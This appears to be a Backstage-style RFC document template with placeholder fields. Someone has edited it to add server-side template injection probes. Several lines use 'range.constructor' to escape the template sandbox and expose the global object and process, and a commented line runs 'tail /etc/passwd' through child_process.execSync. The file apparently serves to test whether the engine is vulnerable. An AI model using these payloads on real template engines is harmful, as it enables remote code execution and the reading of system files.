# RFC-${{ values.rfcNumber }} - ${{ values.rfcTitle }}

HELLO??mosh

*Author(s)*: 
*Squad*: 
*Requested Reviewers*: 
*Status*: DRAFT

values: {{ values | dump }}

glob: {{ range.constructor("let gg=global; delete gg.global;return gg")() | dump}}

23: {{ range.constructor("return global.process")() | dump }}
24: {{ range.constructor("return templateStr.sub")() | dump }}

// range.constructor("return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')")()

test:
eh 'https://my-host.com/my-owner/my-repo' | parseRepoUrl | dump

## Abstract
${{ values.abstract }}


test23:

${{ 23*23 }}

## Background

## Non-Goals

## Key Terms

## Problem

## Proposal

## Technical Limitations

## Open Questions

## Outcomes and Forward References
